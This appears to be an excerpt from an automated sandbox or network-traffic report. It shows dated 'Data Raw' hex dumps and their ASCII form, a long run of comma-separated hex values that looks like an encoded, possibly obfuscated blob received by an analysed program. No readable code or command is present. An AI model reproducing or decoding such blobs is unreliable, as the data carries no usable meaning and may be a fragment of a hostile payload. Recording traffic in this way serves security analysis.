                                                                                                                                                                      2023-11-06 14:35:15 UTC7INData Raw: 33 38 2c 34 34 2c 66 35 2c 31 32 34 2c 31 34 63 2c 34 62 2c 37 37 2c 34 33 2c 31 32 62 2c 31 30 39 2c 38 37 2c 35 36 2c 65 33 2c 35 35 2c 36 35 2c 35 38 2c 31 30 37 2c 66 38 2c 35 65 2c 66 31 2c 31 31 64 2c 31 31 36 2c 33 31 2c 34 65 2c 36 63 2c 31 34 33 2c 31 32 39 2c 31 36 32 2c 31 33 63 2c 31 35 31 2c 31 35 36 2c 65 33 2c 31 31 66 2c 31 30 36 2c 37 34 2c 35 61 2c 36 64 2c 39 61 2c 38 36 2c 31 31 32 2c 65 63 2c 36 63 2c 34 31 2c 35 31 2c 36 33 2c 31 34 63 2c 31 33 62 2c 64 62 2c 31 31 35 2c 35 63 2c 34 38 2c 31 33 62 2c 31 30 34 2c 31 31 31 2c 31 32 38 2c 64 31 2c 31 35 37 2c 61 30 2c 64 33 2c 31 35 32 2c 31 35 33 2c 35 61 2c 36 37 2c 36 32 2c 66 39 2c 31 30 37 2c 63 31 2c 31 35 31 2c 31 34 34 2c 31 30 63 2c 31 34 65 2c 65 36 2c 62 35 2c 31 30 63 2c 65
                                                                                                                                                                      Data Ascii: 38,44,f5,124,14c,4b,77,43,12b,109,87,56,e3,55,65,58,107,f8,5e,f1,11d,116,31,4e,6c,143,129,162,13c,151,156,e3,11f,106,74,5a,6d,9a,86,112,ec,6c,41,51,63,14c,13b,db,115,5c,48,13b,104,111,128,d1,157,a0,d3,152,153,5a,67,62,f9,107,c1,151,144,10c,14e,e6,b5,10c,e
                                                                                                                                                                      2023-11-06 14:35:15 UTC8INData Raw: 63 2c 34 36 2c 33 62 2c 61 65 2c 62 33 2c 61 64 2c 35 33 2c 31 31 39 2c 64 64 2c 37 31 2c 34 63 2c 35 32 2c 63 34 2c 64 37 2c 62 66 2c 31 36 33 2c 36 32 2c 38 65 2c 31 32 63 2c 31 32 62 2c 35 66 2c 36 64 2c 34 62 2c 64 30 2c 63 63 2c 37 39 2c 31 31 36 2c 63 36 2c 31 31 31 2c 64 37 2c 35 65 2c 62 62 2c 61 38 2c 31 32 65 2c 31 31 30 2c 33 65 2c 37 30 2c 34 33 2c 61 38 2c 38 61 2c 31 31 35 2c 62 31 2c 31 34 38 2c 31 35 30 2c 31 36 61 2c 31 35 33 2c 31 35 39 2c 31 34 66 2c 36 64 2c 33 38 2c 34 34 2c 37 34 2c 64 64 2c 65 61 2c 31 32 66 2c 37 37 2c 62 38 2c 36 62 2c 31 33 31 2c 62 36 2c 35 39 2c 31 34 65 2c 35 66 2c 63 66 2c 35 63 2c 31 32 65 2c 62 33 2c 33 64 2c 37 30 2c 34 33 2c 61 38 2c 66 34 2c 61 34 2c 64 36 2c 34 63 2c 31 35 31 2c 61 30 2c 63 30 2c 61 34
                                                                                                                                                                      Data Ascii: c,46,3b,ae,b3,ad,53,119,dd,71,4c,52,c4,d7,bf,163,62,8e,12c,12b,5f,6d,4b,d0,cc,79,116,c6,111,d7,5e,bb,a8,12e,110,3e,70,43,a8,8a,115,b1,148,150,16a,153,159,14f,6d,38,44,74,dd,ea,12f,77,b8,6b,131,b6,59,14e,5f,cf,5c,12e,b3,3d,70,43,a8,f4,a4,d6,4c,151,a0,c0,a4
                                                                                                                                                                      2023-11-06 14:35:15 UTC9INData Raw: 31 35 38 2c 39 36 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 63 35 2c 64 31 2c 31 31 32 2c 65 30 2c 36 61 2c 64 66 2c 31 35 64 2c 64 37 2c 33 39 2c 38 61 2c 66 37 2c 31 32 30 2c 37 63 2c 63 65 2c 31 35 64 2c 31 33 33 2c 38 61 2c 39 63 2c 34 31 2c 31 35 30 2c 39 38 2c 63 31 2c 61 66 2c 39 63 2c 34 36 2c 31 33 37 2c 31 31 30 2c 66 62 2c 31 31 62 2c 64 34 2c 31 30 63 2c 63 33 2c 39 61 2c 62 36 2c 35 65 2c 63 39 2c 38 64 2c 35 66 2c 37 37 2c 62 31 2c 37 63 2c 34 34 2c 65 38 2c 36 66 2c 31 36 63 2c 63 30 2c 37 66 2c 31 32 62 2c 61 35 2c 34 39 2c 34 31 2c 35 31 2c 62 63 2c 64 61 2c 31 32 35 2c 63 63 2c 35 35 2c 63 33 2c 61 65 2c 37 38 2c 31 32 63 2c 63 61 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 31 33 34 2c 31 33 66 2c 36 63 2c 35 34 2c 35 61 2c 66 30 2c 39 32 2c 31
                                                                                                                                                                      Data Ascii: 158,96,14e,130,14d,c5,d1,112,e0,6a,df,15d,d7,39,8a,f7,120,7c,ce,15d,133,8a,9c,41,150,98,c1,af,9c,46,137,110,fb,11b,d4,10c,c3,9a,b6,5e,c9,8d,5f,77,b1,7c,44,e8,6f,16c,c0,7f,12b,a5,49,41,51,bc,da,125,cc,55,c3,ae,78,12c,ca,130,14d,16b,134,13f,6c,54,5a,f0,92,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC11INData Raw: 30 61 2c 36 37 2c 35 61 2c 36 37 2c 31 34 64 2c 36 36 2c 63 66 2c 62 39 2c 31 34 36 2c 66 38 2c 35 33 2c 31 30 32 2c 34 63 2c 62 64 2c 37 66 2c 31 31 64 2c 61 31 2c 62 34 2c 31 33 64 2c 63 39 2c 36 65 2c 34 36 2c 33 38 2c 39 32 2c 63 39 2c 31 30 36 2c 64 61 2c 39 36 2c 31 33 36 2c 66 37 2c 39 31 2c 31 32 65 2c 66 34 2c 39 39 2c 31 33 61 2c 65 61 2c 64 66 2c 31 31 63 2c 34 34 2c 65 39 2c 36 30 2c 62 64 2c 31 33 33 2c 64 35 2c 35 36 2c 33 34 2c 33 32 2c 31 32 39 2c 63 66 2c 37 36 2c 35 35 2c 36 35 2c 31 31 66 2c 38 62 2c 31 33 34 2c 31 33 37 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 62 63 2c 39 33 2c 31 34 63 2c 31 33 34 2c 39 61 2c 37 38 2c 35 34 2c 35 61 2c 31 32 61 2c 31 34 61 2c 37 31 2c 36 38 2c 37 34 2c 35 61 2c 31 35 36 2c 65 66 2c 31 37 35 2c 31 34 32
                                                                                                                                                                      Data Ascii: 0a,67,5a,67,14d,66,cf,b9,146,f8,53,102,4c,bd,7f,11d,a1,b4,13d,c9,6e,46,38,92,c9,106,da,96,136,f7,91,12e,f4,99,13a,ea,df,11c,44,e9,60,bd,133,d5,56,34,32,129,cf,76,55,65,11f,8b,134,137,16f,142,14e,bc,93,14c,134,9a,78,54,5a,12a,14a,71,68,74,5a,156,ef,175,142
                                                                                                                                                                      2023-11-06 14:35:15 UTC12INData Raw: 2c 61 36 2c 33 38 2c 62 39 2c 38 63 2c 31 34 32 2c 37 61 2c 35 66 2c 37 37 2c 34 33 2c 39 65 2c 35 30 2c 31 32 39 2c 61 63 2c 37 35 2c 35 35 2c 36 35 2c 63 30 2c 31 34 35 2c 33 38 2c 33 39 2c 37 30 2c 31 32 62 2c 65 63 2c 34 30 2c 34 65 2c 36 63 2c 61 35 2c 61 62 2c 66 36 2c 63 39 2c 36 32 2c 66 34 2c 39 36 2c 31 32 64 2c 64 34 2c 62 33 2c 39 65 2c 36 64 2c 38 34 2c 39 35 2c 62 37 2c 33 38 2c 62 64 2c 31 30 38 2c 31 33 63 2c 64 31 2c 62 66 2c 37 64 2c 31 34 30 2c 35 31 2c 35 64 2c 33 39 2c 37 30 2c 39 63 2c 64 61 2c 31 32 39 2c 38 39 2c 31 36 37 2c 63 31 2c 36 31 2c 31 35 33 2c 66 66 2c 31 35 38 2c 31 36 36 2c 31 36 31 2c 66 66 2c 34 34 2c 38 30 2c 35 61 2c 36 64 2c 34 62 2c 61 61 2c 31 30 33 2c 31 31 66 2c 38 33 2c 61 62 2c 35 62 2c 31 34 62 2c 61 65 2c
                                                                                                                                                                      Data Ascii: ,a6,38,b9,8c,142,7a,5f,77,43,9e,50,129,ac,75,55,65,c0,145,38,39,70,12b,ec,40,4e,6c,a5,ab,f6,c9,62,f4,96,12d,d4,b3,9e,6d,84,95,b7,38,bd,108,13c,d1,bf,7d,140,51,5d,39,70,9c,da,129,89,167,c1,61,153,ff,158,166,161,ff,44,80,5a,6d,4b,aa,103,11f,83,ab,5b,14b,ae,
                                                                                                                                                                      2023-11-06 14:35:15 UTC13INData Raw: 2c 61 36 2c 36 66 2c 34 66 2c 31 36 65 2c 31 31 36 2c 35 35 2c 63 65 2c 66 39 2c 31 31 35 2c 36 33 2c 35 35 2c 36 35 2c 31 35 36 2c 34 66 2c 61 64 2c 33 66 2c 66 62 2c 39 30 2c 35 37 2c 35 32 2c 61 37 2c 37 30 2c 64 37 2c 61 66 2c 37 37 2c 64 66 2c 61 64 2c 36 66 2c 65 64 2c 39 33 2c 34 38 2c 66 66 2c 61 37 2c 31 36 39 2c 34 65 2c 63 34 2c 31 33 37 2c 62 64 2c 38 63 2c 34 35 2c 64 63 2c 62 38 2c 36 31 2c 66 30 2c 62 32 2c 34 61 2c 63 33 2c 38 62 2c 37 38 2c 63 63 2c 61 32 2c 33 39 2c 64 37 2c 62 39 2c 31 34 38 2c 64 64 2c 31 33 63 2c 31 31 35 2c 31 35 34 2c 36 62 2c 61 63 2c 62 62 2c 31 33 65 2c 62 33 2c 64 30 2c 37 30 2c 62 35 2c 62 36 2c 39 64 2c 62 66 2c 38 66 2c 31 33 39 2c 64 34 2c 31 34 36 2c 35 36 2c 65 65 2c 62 35 2c 31 33 61 2c 34 37 2c 62 65 2c
                                                                                                                                                                      Data Ascii: ,a6,6f,4f,16e,116,55,ce,f9,115,63,55,65,156,4f,ad,3f,fb,90,57,52,a7,70,d7,af,77,df,ad,6f,ed,93,48,ff,a7,169,4e,c4,137,bd,8c,45,dc,b8,61,f0,b2,4a,c3,8b,78,cc,a2,39,d7,b9,148,dd,13c,115,154,6b,ac,bb,13e,b3,d0,70,b5,b6,9d,bf,8f,139,d4,146,56,ee,b5,13a,47,be,
                                                                                                                                                                      2023-11-06 14:35:15 UTC15INData Raw: 2c 34 36 2c 62 38 2c 33 39 2c 37 30 2c 39 36 2c 61 30 2c 31 33 30 2c 31 32 34 2c 66 37 2c 35 39 2c 31 34 36 2c 63 30 2c 39 38 2c 35 61 2c 31 30 38 2c 31 32 32 2c 38 33 2c 38 38 2c 37 34 2c 31 31 34 2c 36 64 2c 34 62 2c 37 37 2c 63 33 2c 31 30 37 2c 31 31 63 2c 34 61 2c 61 31 2c 36 62 2c 66 36 2c 31 32 35 2c 61 33 2c 38 61 2c 33 38 2c 63 34 2c 62 30 2c 35 33 2c 64 61 2c 33 65 2c 31 34 32 2c 63 31 2c 39 30 2c 35 32 2c 65 65 2c 66 38 2c 65 32 2c 31 32 62 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 66 62 2c 31 32 64 2c 39 36 2c 62 62 2c 34 33 2c 62 66 2c 37 32 2c 35 31 2c 31 34 66 2c 61 62 2c 39 38 2c 31 30 36 2c 31 31 38 2c 39 31 2c 37 63 2c 33 39 2c 66 62 2c 38 62 2c 35 66 2c 62 31 2c 63 37 2c 61 66 2c 34 63 2c 63 37 2c 37 34 2c 64 37 2c 62 61 2c 36 62 2c 31 36
                                                                                                                                                                      Data Ascii: ,46,b8,39,70,96,a0,130,124,f7,59,146,c0,98,5a,108,122,83,88,74,114,6d,4b,77,c3,107,11c,4a,a1,6b,f6,125,a3,8a,38,c4,b0,53,da,3e,142,c1,90,52,ee,f8,e2,12b,62,38,44,74,fb,12d,96,bb,43,bf,72,51,14f,ab,98,106,118,91,7c,39,fb,8b,5f,b1,c7,af,4c,c7,74,d7,ba,6b,16
                                                                                                                                                                      2023-11-06 14:35:15 UTC16INData Raw: 2c 64 36 2c 39 62 2c 39 38 2c 35 62 2c 36 37 2c 36 32 2c 61 32 2c 38 33 2c 66 64 2c 39 66 2c 31 36 35 2c 61 35 2c 31 30 30 2c 38 33 2c 33 63 2c 62 62 2c 38 31 2c 35 35 2c 65 36 2c 31 31 35 2c 36 64 2c 61 32 2c 62 62 2c 31 32 63 2c 61 33 2c 37 34 2c 63 65 2c 31 34 61 2c 39 39 2c 34 65 2c 37 63 2c 34 63 2c 35 32 2c 31 32 63 2c 31 33 62 2c 36 39 2c 36 61 2c 64 62 2c 34 34 2c 61 63 2c 37 34 2c 64 61 2c 36 64 2c 34 62 2c 63 65 2c 31 34 32 2c 34 39 2c 34 65 2c 66 31 2c 39 31 2c 36 33 2c 64 61 2c 31 32 35 2c 63 64 2c 34 65 2c 62 62 2c 31 30 31 2c 31 36 66 2c 31 32 63 2c 65 63 2c 33 31 2c 34 65 2c 36 63 2c 64 39 2c 65 39 2c 36 62 2c 63 34 2c 35 61 2c 36 37 2c 65 62 2c 38 64 2c 31 34 30 2c 61 66 2c 31 35 34 2c 65 34 2c 38 65 2c 31 30 32 2c 31 30 64 2c 35 66 2c 31
                                                                                                                                                                      Data Ascii: ,d6,9b,98,5b,67,62,a2,83,fd,9f,165,a5,100,83,3c,bb,81,55,e6,115,6d,a2,bb,12c,a3,74,ce,14a,99,4e,7c,4c,52,12c,13b,69,6a,db,44,ac,74,da,6d,4b,ce,142,49,4e,f1,91,63,da,125,cd,4e,bb,101,16f,12c,ec,31,4e,6c,d9,e9,6b,c4,5a,67,eb,8d,140,af,154,e4,8e,102,10d,5f,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC17INData Raw: 33 2c 61 33 2c 37 38 2c 65 33 2c 63 36 2c 34 66 2c 31 30 32 2c 39 32 2c 33 38 2c 62 64 2c 63 30 2c 35 39 2c 65 63 2c 63 65 2c 36 64 2c 65 33 2c 39 33 2c 34 38 2c 36 34 2c 31 33 65 2c 34 34 2c 39 63 2c 31 32 64 2c 64 31 2c 65 39 2c 31 34 38 2c 35 32 2c 37 61 2c 65 32 2c 66 66 2c 36 37 2c 36 32 2c 33 38 2c 63 66 2c 66 31 2c 31 35 36 2c 66 38 2c 39 38 2c 38 33 2c 31 30 34 2c 31 33 33 2c 33 36 2c 39 30 2c 64 65 2c 61 66 2c 38 36 2c 31 36 31 2c 64 62 2c 31 34 35 2c 37 37 2c 61 66 2c 37 33 2c 61 64 2c 38 65 2c 39 30 2c 64 39 2c 63 39 2c 31 34 30 2c 64 66 2c 38 37 2c 31 34 66 2c 65 33 2c 63 34 2c 37 32 2c 63 33 2c 39 66 2c 37 38 2c 65 33 2c 63 36 2c 34 66 2c 31 30 32 2c 61 30 2c 34 34 2c 62 62 2c 39 61 2c 35 39 2c 65 63 2c 61 30 2c 36 39 2c 65 33 2c 39 66 2c 33
                                                                                                                                                                      Data Ascii: 3,a3,78,e3,c6,4f,102,92,38,bd,c0,59,ec,ce,6d,e3,93,48,64,13e,44,9c,12d,d1,e9,148,52,7a,e2,ff,67,62,38,cf,f1,156,f8,98,83,104,133,36,90,de,af,86,161,db,145,77,af,73,ad,8e,90,d9,c9,140,df,87,14f,e3,c4,72,c3,9f,78,e3,c6,4f,102,a0,44,bb,9a,59,ec,a0,69,e3,9f,3
                                                                                                                                                                      2023-11-06 14:35:15 UTC19INData Raw: 2c 34 30 2c 61 65 2c 63 37 2c 63 64 2c 39 62 2c 33 37 2c 35 32 2c 66 34 2c 39 39 2c 36 31 2c 31 36 39 2c 31 31 35 2c 65 32 2c 62 33 2c 36 38 2c 33 63 2c 63 37 2c 31 37 32 2c 37 61 2c 65 30 2c 36 37 2c 66 37 2c 63 30 2c 34 33 2c 33 32 2c 62 36 2c 35 66 2c 65 65 2c 31 32 33 2c 31 32 34 2c 35 38 2c 34 36 2c 33 38 2c 62 39 2c 31 34 33 2c 31 33 32 2c 64 61 2c 37 65 2c 35 36 2c 37 35 2c 38 35 2c 64 66 2c 61 66 2c 65 34 2c 39 65 2c 66 32 2c 31 33 30 2c 31 32 33 2c 36 34 2c 66 34 2c 64 37 2c 37 63 2c 34 62 2c 65 63 2c 35 33 2c 63 31 2c 38 30 2c 31 32 31 2c 31 31 30 2c 36 33 2c 35 35 2c 36 35 2c 64 38 2c 31 31 39 2c 31 32 37 2c 63 34 2c 62 64 2c 34 62 2c 35 38 2c 61 61 2c 35 32 2c 66 39 2c 64 30 2c 65 32 2c 31 32 66 2c 35 34 2c 35 61 2c 36 37 2c 65 66 2c 38 36 2c
                                                                                                                                                                      Data Ascii: ,40,ae,c7,cd,9b,37,52,f4,99,61,169,115,e2,b3,68,3c,c7,172,7a,e0,67,f7,c0,43,32,b6,5f,ee,123,124,58,46,38,b9,143,132,da,7e,56,75,85,df,af,e4,9e,f2,130,123,64,f4,d7,7c,4b,ec,53,c1,80,121,110,63,55,65,d8,119,127,c4,bd,4b,58,aa,52,f9,d0,e2,12f,54,5a,67,ef,86,
                                                                                                                                                                      2023-11-06 14:35:15 UTC20INData Raw: 2c 63 65 2c 61 34 2c 31 32 64 2c 64 39 2c 31 33 36 2c 62 35 2c 31 31 62 2c 36 66 2c 35 36 2c 35 61 2c 36 37 2c 65 66 2c 63 34 2c 34 35 2c 62 38 2c 35 62 2c 36 64 2c 34 62 2c 31 30 30 2c 39 30 2c 31 32 38 2c 62 64 2c 38 64 2c 65 31 2c 61 37 2c 38 38 2c 31 36 34 2c 37 62 2c 31 31 34 2c 61 64 2c 34 62 2c 66 62 2c 63 66 2c 64 66 2c 66 35 2c 34 65 2c 36 63 2c 34 63 2c 37 35 2c 62 38 2c 31 34 63 2c 63 34 2c 38 37 2c 63 31 2c 31 32 33 2c 34 37 2c 37 37 2c 31 32 33 2c 62 34 2c 64 30 2c 31 34 30 2c 63 30 2c 31 32 64 2c 62 64 2c 38 65 2c 31 34 35 2c 65 65 2c 61 39 2c 31 35 65 2c 35 63 2c 64 31 2c 34 32 2c 36 34 2c 62 64 2c 31 33 33 2c 64 61 2c 31 32 32 2c 31 30 66 2c 31 36 61 2c 35 30 2c 61 30 2c 65 65 2c 31 35 32 2c 39 39 2c 66 30 2c 61 66 2c 31 33 30 2c 63 32 2c
                                                                                                                                                                      Data Ascii: ,ce,a4,12d,d9,136,b5,11b,6f,56,5a,67,ef,c4,45,b8,5b,6d,4b,100,90,128,bd,8d,e1,a7,88,164,7b,114,ad,4b,fb,cf,df,f5,4e,6c,4c,75,b8,14c,c4,87,c1,123,47,77,123,b4,d0,140,c0,12d,bd,8e,145,ee,a9,15e,5c,d1,42,64,bd,133,da,122,10f,16a,50,a0,ee,152,99,f0,af,130,c2,
                                                                                                                                                                      2023-11-06 14:35:15 UTC21INData Raw: 31 32 62 2c 66 62 2c 61 63 2c 65 34 2c 37 66 2c 61 64 2c 34 62 2c 64 62 2c 31 34 32 2c 36 39 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 65 30 2c 61 39 2c 37 63 2c 35 36 2c 63 31 2c 61 35 2c 39 34 2c 35 33 2c 64 63 2c 39 64 2c 37 32 2c 37 63 2c 37 37 2c 31 33 32 2c 62 65 2c 61 61 2c 62 31 2c 31 30 38 2c 31 33 32 2c 37 39 2c 38 38 2c 37 34 2c 38 62 2c 62 32 2c 31 34 37 2c 61 61 2c 31 30 38 2c 38 34 2c 62 62 2c 61 36 2c 31 33 39 2c 31 36 32 2c 63 61 2c 31 35 64 2c 65 33 2c 38 62 2c 31 33 34 2c 31 30 30 2c 62 35 2c 31 33 66 2c 31 34 64 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 64 35 2c 39 37 2c 31 36 33 2c 65 31 2c 39 66 2c 31 35 37 2c 63 36 2c 64 62 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 31 30 65 2c 31 30 32 2c 39 30 2c 31 32 34 2c 39 36 2c 63 61 2c 35 65 2c 36 33
                                                                                                                                                                      Data Ascii: 12b,fb,ac,e4,7f,ad,4b,db,142,69,32,41,51,63,e0,a9,7c,56,c1,a5,94,53,dc,9d,72,7c,77,132,be,aa,b1,108,132,79,88,74,8b,b2,147,aa,108,84,bb,a6,139,162,ca,15d,e3,8b,134,100,b5,13f,14d,130,14d,16b,d5,97,163,e1,9f,157,c6,db,44,74,5a,6d,10e,102,90,124,96,ca,5e,63
                                                                                                                                                                      2023-11-06 14:35:15 UTC23INData Raw: 2c 31 31 32 2c 36 37 2c 33 65 2c 37 39 2c 31 33 39 2c 39 39 2c 37 31 2c 36 35 2c 35 38 2c 64 31 2c 38 36 2c 34 35 2c 66 62 2c 39 39 2c 35 37 2c 33 34 2c 31 31 64 2c 39 66 2c 35 38 2c 38 63 2c 31 35 33 2c 37 61 2c 37 36 2c 36 37 2c 36 32 2c 63 33 2c 38 39 2c 31 36 34 2c 65 35 2c 62 35 2c 35 33 2c 31 30 32 2c 31 31 61 2c 31 31 63 2c 36 33 2c 35 65 2c 35 31 2c 36 33 2c 31 30 66 2c 31 36 33 2c 31 35 37 2c 31 34 35 2c 31 33 37 2c 37 32 2c 63 33 2c 34 66 2c 35 65 2c 62 35 2c 61 30 2c 31 36 62 2c 31 34 62 2c 31 35 31 2c 64 33 2c 31 32 34 2c 39 62 2c 61 62 2c 36 32 2c 38 66 2c 63 66 2c 31 33 66 2c 31 34 32 2c 62 36 2c 36 38 2c 37 37 2c 34 33 2c 31 31 64 2c 34 65 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 61 61 2c 66 30 2c 31 34 34 2c 63 39 2c 31 32 34 2c 33 64 2c 66
                                                                                                                                                                      Data Ascii: ,112,67,3e,79,139,99,71,65,58,d1,86,45,fb,99,57,34,11d,9f,58,8c,153,7a,76,67,62,c3,89,164,e5,b5,53,102,11a,11c,63,5e,51,63,10f,163,157,145,137,72,c3,4f,5e,b5,a0,16b,14b,151,d3,124,9b,ab,62,8f,cf,13f,142,b6,68,77,43,11d,4e,140,150,162,aa,f0,144,c9,124,3d,f
                                                                                                                                                                      2023-11-06 14:35:15 UTC24INData Raw: 37 36 2c 31 34 38 2c 62 37 2c 35 33 2c 38 33 2c 64 65 2c 38 34 2c 31 32 33 2c 36 34 2c 31 30 37 2c 65 31 2c 38 62 2c 31 32 63 2c 63 32 2c 63 64 2c 31 32 62 2c 64 38 2c 38 36 2c 31 33 61 2c 66 35 2c 39 39 2c 31 34 32 2c 31 32 33 2c 35 35 2c 35 61 2c 36 37 2c 36 32 2c 34 37 2c 65 36 2c 66 64 2c 61 66 2c 31 36 39 2c 64 34 2c 62 63 2c 31 33 62 2c 38 66 2c 31 32 39 2c 38 36 2c 31 34 64 2c 36 33 2c 35 35 2c 36 35 2c 35 63 2c 62 61 2c 34 36 2c 31 32 31 2c 63 63 2c 31 34 32 2c 31 34 65 2c 31 33 30 2c 64 33 2c 31 32 63 2c 63 30 2c 35 37 2c 39 65 2c 31 31 34 2c 39 61 2c 31 35 32 2c 36 34 2c 36 62 2c 31 30 34 2c 63 66 2c 31 32 33 2c 31 33 30 2c 31 33 33 2c 31 31 30 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 65 34 2c 31 32 39 2c 62 38 2c 39 39 2c 36 35 2c 38 62 2c 31 30
                                                                                                                                                                      Data Ascii: 76,148,b7,53,83,de,84,123,64,107,e1,8b,12c,c2,cd,12b,d8,86,13a,f5,99,142,123,55,5a,67,62,47,e6,fd,af,169,d4,bc,13b,8f,129,86,14d,63,55,65,5c,ba,46,121,cc,142,14e,130,d3,12c,c0,57,9e,114,9a,152,64,6b,104,cf,123,130,133,110,142,133,131,e4,129,b8,99,65,8b,10
                                                                                                                                                                      2023-11-06 14:35:15 UTC25INData Raw: 2c 38 64 2c 38 38 2c 37 34 2c 35 61 2c 63 36 2c 62 66 2c 39 32 2c 61 62 2c 31 30 38 2c 38 37 2c 38 35 2c 35 31 2c 31 34 62 2c 31 34 35 2c 37 66 2c 35 38 2c 34 36 2c 39 31 2c 62 65 2c 31 33 30 2c 62 37 2c 35 62 2c 39 62 2c 34 65 2c 64 36 2c 34 65 2c 62 63 2c 36 62 2c 31 35 33 2c 36 66 2c 31 33 62 2c 62 37 2c 37 63 2c 34 34 2c 61 37 2c 31 31 61 2c 63 61 2c 31 30 65 2c 65 31 2c 35 62 2c 39 63 2c 64 61 2c 31 30 34 2c 39 31 2c 36 33 2c 31 33 64 2c 31 35 34 2c 31 35 32 2c 31 34 35 2c 31 33 37 2c 61 33 2c 37 38 2c 31 32 62 2c 31 34 30 2c 31 32 30 2c 31 34 64 2c 31 36 62 2c 61 35 2c 64 35 2c 64 30 2c 31 35 30 2c 35 61 2c 39 61 2c 31 33 64 2c 37 62 2c 37 64 2c 39 31 2c 31 34 65 2c 62 38 2c 38 66 2c 37 37 2c 35 32 2c 62 38 2c 66 37 2c 34 31 2c 35 31 2c 36 33 2c 64
                                                                                                                                                                      Data Ascii: ,8d,88,74,5a,c6,bf,92,ab,108,87,85,51,14b,145,7f,58,46,91,be,130,b7,5b,9b,4e,d6,4e,bc,6b,153,6f,13b,b7,7c,44,a7,11a,ca,10e,e1,5b,9c,da,104,91,63,13d,154,152,145,137,a3,78,12b,140,120,14d,16b,a5,d5,d0,150,5a,9a,13d,7b,7d,91,14e,b8,8f,77,52,b8,f7,41,51,63,d
                                                                                                                                                                      2023-11-06 14:35:15 UTC27INData Raw: 31 32 65 2c 64 66 2c 31 35 39 2c 62 64 2c 31 34 61 2c 63 36 2c 34 66 2c 37 34 2c 35 61 2c 66 38 2c 31 33 62 2c 63 64 2c 31 32 62 2c 35 36 2c 33 34 2c 34 31 2c 35 31 2c 62 39 2c 31 33 64 2c 31 30 33 2c 36 61 2c 34 36 2c 33 38 2c 38 66 2c 31 35 38 2c 37 65 2c 36 30 2c 33 31 2c 34 65 2c 63 32 2c 31 33 34 2c 31 31 63 2c 38 38 2c 35 34 2c 35 61 2c 62 64 2c 31 34 61 2c 65 64 2c 36 31 2c 37 34 2c 35 61 2c 63 33 2c 31 33 33 2c 31 31 34 2c 35 65 2c 33 34 2c 33 32 2c 39 37 2c 31 33 39 2c 65 38 2c 35 37 2c 36 35 2c 35 38 2c 39 63 2c 31 32 30 2c 62 39 2c 38 62 2c 34 33 2c 34 66 2c 39 39 2c 61 35 2c 39 37 2c 38 63 2c 35 32 2c 31 35 33 2c 31 33 34 2c 36 34 2c 36 37 2c 36 32 2c 62 62 2c 31 30 38 2c 39 38 2c 66 64 2c 31 31 64 2c 38 62 2c 62 62 2c 34 33 2c 39 32 2c 66 35
                                                                                                                                                                      Data Ascii: 12e,df,159,bd,14a,c6,4f,74,5a,f8,13b,cd,12b,56,34,41,51,b9,13d,103,6a,46,38,8f,158,7e,60,31,4e,c2,134,11c,88,54,5a,bd,14a,ed,61,74,5a,c3,133,114,5e,34,32,97,139,e8,57,65,58,9c,120,b9,8b,43,4f,99,a5,97,8c,52,153,134,64,67,62,bb,108,98,fd,11d,8b,bb,43,92,f5
                                                                                                                                                                      2023-11-06 14:35:15 UTC28INData Raw: 30 37 2c 34 38 2c 39 61 2c 35 31 2c 37 31 2c 36 34 2c 35 35 2c 63 64 2c 39 30 2c 66 64 2c 37 38 2c 33 39 2c 63 37 2c 31 32 62 2c 38 64 2c 34 64 2c 34 65 2c 36 63 2c 63 66 2c 31 31 36 2c 37 37 2c 31 33 66 2c 38 63 2c 64 31 2c 31 35 36 2c 31 33 37 2c 35 39 2c 64 63 2c 31 30 61 2c 61 64 2c 34 62 2c 31 30 32 2c 31 31 62 2c 36 66 2c 31 31 30 2c 62 35 2c 37 35 2c 65 36 2c 31 35 30 2c 31 36 34 2c 63 63 2c 36 35 2c 61 32 2c 33 39 2c 66 64 2c 38 38 2c 31 34 37 2c 38 31 2c 64 62 2c 61 30 2c 31 34 39 2c 31 30 65 2c 61 62 2c 39 38 2c 35 61 2c 31 36 36 2c 39 38 2c 31 32 30 2c 66 30 2c 39 32 2c 35 61 2c 36 64 2c 61 34 2c 63 37 2c 31 34 32 2c 36 61 2c 38 35 2c 31 34 30 2c 36 36 2c 63 37 2c 31 30 35 2c 61 35 2c 35 38 2c 61 35 2c 39 36 2c 39 34 2c 31 33 39 2c 31 30 36 2c
                                                                                                                                                                      Data Ascii: 07,48,9a,51,71,64,55,cd,90,fd,78,39,c7,12b,8d,4d,4e,6c,cf,116,77,13f,8c,d1,156,137,59,dc,10a,ad,4b,102,11b,6f,110,b5,75,e6,150,164,cc,65,a2,39,fd,88,147,81,db,a0,149,10e,ab,98,5a,166,98,120,f0,92,5a,6d,a4,c7,142,6a,85,140,66,c7,105,a5,58,a5,96,94,139,106,
                                                                                                                                                                      2023-11-06 14:35:15 UTC29INData Raw: 35 2c 62 61 2c 37 39 2c 37 64 2c 37 30 2c 63 65 2c 31 32 30 2c 33 34 2c 31 34 37 2c 61 37 2c 31 32 33 2c 63 66 2c 38 66 2c 62 66 2c 31 32 33 2c 37 33 2c 65 64 2c 62 36 2c 61 30 2c 66 37 2c 62 65 2c 61 36 2c 35 33 2c 37 37 2c 63 65 2c 37 31 2c 61 32 2c 38 32 2c 39 35 2c 36 33 2c 65 30 2c 38 32 2c 63 63 2c 38 37 2c 37 63 2c 33 39 2c 62 32 2c 34 36 2c 31 32 65 2c 62 34 2c 31 30 66 2c 37 38 2c 38 37 2c 31 32 35 2c 65 37 2c 31 33 36 2c 65 35 2c 63 34 2c 31 35 65 2c 63 33 2c 34 34 2c 66 66 2c 64 38 2c 64 31 2c 38 38 2c 31 30 35 2c 34 33 2c 33 34 2c 66 32 2c 62 36 2c 35 61 2c 31 32 61 2c 39 62 2c 63 39 2c 64 62 2c 34 36 2c 33 38 2c 33 39 2c 31 35 62 2c 61 31 2c 38 63 2c 63 31 2c 34 65 2c 36 63 2c 31 30 63 2c 63 37 2c 37 34 2c 31 31 62 2c 61 30 2c 63 62 2c 65 33
